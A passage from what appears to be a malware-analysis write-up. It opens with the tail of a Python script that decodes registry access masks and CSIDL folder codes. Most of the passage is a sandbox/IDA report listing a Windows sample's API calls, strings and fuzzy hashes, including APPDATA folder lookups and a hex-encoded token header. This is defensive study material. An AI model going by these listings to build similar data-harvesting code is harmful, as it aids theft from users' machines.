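    """Name the rights in a samDesired mask: composite rights first, then leftover bits."""
    names, rest = [], mask
    for combo, name in ((KEY_ALL_ACCESS, "KEY_ALL_ACCESS"), (KEY_READ, "KEY_READ"),
                        (KEY_WRITE, "KEY_WRITE")):
        if rest & combo == combo:
            names.append(name)
            rest &= ~combo
    for bit, name in KEY_BITS:
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")
    return names


def annotate(call: ApiCall) -> dict:
    """Decode the arguments of the calls that matter for triage; {} for the rest."""
    a, notes = call.args, {}
    if call.api.startswith("RegOpenKeyEx") and len(a) >= 4:
        if isinstance(a[0], int):
            notes["root"] = HKEY_ROOTS.get(a[0], f"handle 0x{a[0]:x}")
        if isinstance(a[3], int):
            notes["access"] = decode_key_access(a[3])
    elif call.api.startswith("SHGetFolderPath") and len(a) >= 2 and isinstance(a[1], int):
        csidl = a[1] & ~CSIDL_FLAG_MASK
        notes["folder"] = CSIDL.get(csidl, f"CSIDL 0x{csidl:x}")
        if a[1] & CSIDL_FLAG_CREATE:
            notes["flags"] = ["CSIDL_FLAG_CREATE"]
    return notes


def triage(text: str) -> list:
    """(ref, api, notes) for every decodable call, in listing order."""
    return [(c.ref, c.api, n) for c in parse_api_lines(text) if (n := annotate(c))]


if __name__ == "__main__":
    for ref, api, notes in triage(SAMPLE):
        print(f"{ref:08X} {api}: {notes}")
```

Run on the two entries it carries, triage() reports the HKLM open at 0032318C as KEY_READ plus KEY_WOW64_64KEY and the folder lookup at 0031E544 as CSIDL_APPDATA; paste a whole function block in and the headings are ignored, so the same script works over the full listing.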
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1D5
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003089CD
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 49e54e8312375aebf42b76d6d523ec5074e47b3c86389d30e5bb2028a5916405
                                  • Instruction ID: 3bec2d968cf2b9c67c99fcae0cbdaf7d168853d540766f5fbd518a782d33846b
                                  • Opcode Fuzzy Hash: 49e54e8312375aebf42b76d6d523ec5074e47b3c86389d30e5bb2028a5916405
                                  • Instruction Fuzzy Hash: D421D6723016508BC722EB5CE860A6AF7A9DBA1761B11093FF1C1CB6C1CB71D851C3A5
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308883
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 2bd74e5d743b69bc7a7ba679da4c86def6ae274961d5a87c05cf944f2a1d2268
                                  • Instruction ID: c4805d27f465491583144e5b28d84b25c56fa7e8f4961f6e5ec42528eb8f0ae1
                                  • Opcode Fuzzy Hash: 2bd74e5d743b69bc7a7ba679da4c86def6ae274961d5a87c05cf944f2a1d2268
                                  • Instruction Fuzzy Hash: 7E3187B5E005159FCB09DF58C8916AEBBB6EB88350F14C269E915EF385DB30AD01CBD1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325922
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 038b783969037af6b36371d661d7d7aa660510ecee0e8946d2ad32d9b370d59e
                                  • Instruction ID: 5a67ae9131dccfe02e215f47802ed4b2cbe6f14ef410bdbddf809525659251ae
                                  • Opcode Fuzzy Hash: 038b783969037af6b36371d661d7d7aa660510ecee0e8946d2ad32d9b370d59e
                                  • Instruction Fuzzy Hash: 3B117030318B60CBD7238B2CF840719B7E5AB91761F250A99E0D18B695C771EA81C7A1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0032A430,000000FF), ref: 00323D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00323D27
                                  • wsprintfA.USER32 ref: 00323D37
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 2ba6c8ccd90344bb7331d560f3d8ab86df08f1c245c7b8997ad938cbd792988d
                                  • Instruction ID: 6a70d2fd52e83f1f993a3e1cbf429157351734b503f2875eea6964cc72db3c39
                                  • Opcode Fuzzy Hash: 2ba6c8ccd90344bb7331d560f3d8ab86df08f1c245c7b8997ad938cbd792988d
                                  • Instruction Fuzzy Hash: 6A01C0B1644710BBE7145B54DC4EF6ABB68FB55B61F100115FA059B3D0D7B42904CAA1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308737
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 80bdbbb4cc5836de8430f7e56af5a80cdd4792982dc250e9698ebe234771f3c5
                                  • Instruction ID: a4184f52802fbe1f59ce5d1d115f277f2beeb38fe46cc97350950149a6143b3b
                                  • Opcode Fuzzy Hash: 80bdbbb4cc5836de8430f7e56af5a80cdd4792982dc250e9698ebe234771f3c5
                                  • Instruction Fuzzy Hash: FAF0F033B010310FC306663D8C8409FA80657E079033AC720E88AEF29DDC30EC8281D4
                                  APIs
                                    • Part of subcall function 0032781C: __mtinitlocknum.LIBCMT ref: 00327832
                                    • Part of subcall function 0032781C: __amsg_exit.LIBCMT ref: 0032783E
                                  • ___addlocaleref.LIBCMT ref: 00328756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu3$xt3
                                  • API String ID: 3105635775-3877037853
                                  • Opcode ID: d77e42991292740531999373fd0dec80305541f0e41bd90ef6a0fde5bdfc4c04
                                  • Instruction ID: f006dad1a57817457ae430f240934504c90d63388fc932dcc99b415ddc4d98c1
                                  • Opcode Fuzzy Hash: d77e42991292740531999373fd0dec80305541f0e41bd90ef6a0fde5bdfc4c04
                                  • Instruction Fuzzy Hash: F201D671845710DAE722AF79E84A74EF7E0BF51320F20890DE1D65B2E0CBB4A604CB14
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E573
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E581
                                  • lstrcat.KERNEL32(?,0102D108), ref: 0031E59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 2f6fbe34dc99c6430b3794678ffdac6697d9a502ee8c1e7840f3b21369078a27
                                  • Instruction ID: 464f66ab5b0db06e682ecfcf0b4800abf7dd9027e2deec67d25c070f0a8d2b6c
                                  • Opcode Fuzzy Hash: 2f6fbe34dc99c6430b3794678ffdac6697d9a502ee8c1e7840f3b21369078a27
                                  • Instruction Fuzzy Hash: 3051B8B5A10208AFC75BEB54EC56EFE737DEB58300F444458F9059B381DE70AE898BA0
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00321FDF, 00321FF5, 003220B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 5f53af8e1080714cd787092596421f5f41c99587b5eea2df7e99b4463b6f2322
                                  • Instruction ID: fc418ab4bdb0cadb4987f52c9c02e351ccc63e0f6a869789c2df257a32b6f732
                                  • Opcode Fuzzy Hash: 5f53af8e1080714cd787092596421f5f41c99587b5eea2df7e99b4463b6f2322
                                  • Instruction Fuzzy Hash: 8521A035510299AFC722EB35EC847EFF367EF80361F85C156D8180B241E332290AD796
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031EBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031EBF1
                                  • lstrcat.KERNEL32(?,0102E000), ref: 0031EC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 7b5a9e6998d0ba03d2ac0f63a4133084c7243ffd0e13073049dfc805d71f5fb3
                                  • Instruction ID: a49a9d4927325d36a667a94492fe2d59db8ca2a76e39ac9e46c1fbf168158374
                                  • Opcode Fuzzy Hash: 7b5a9e6998d0ba03d2ac0f63a4133084c7243ffd0e13073049dfc805d71f5fb3
                                  • Instruction Fuzzy Hash: 9D31BB71A1111D9BCB26EF68DC55BEE77B4FF58300F1044A8BA06DB390DE709E988B90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0032A3D0,000000FF), ref: 00322B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00322B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0032A3D0,000000FF), ref: 00322BA2
                                  • wsprintfA.USER32 ref: 00322BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 7aef96dbef1987d2c0884f25736fead38ef83bcae8d3c86deb6ec569bf4cd1d0
                                  • Instruction ID: 3d6da87079207444fc29cb7be5c18165632e9e04843cd5810901b54871c5a4f2
                                  • Opcode Fuzzy Hash: 7aef96dbef1987d2c0884f25736fead38ef83bcae8d3c86deb6ec569bf4cd1d0
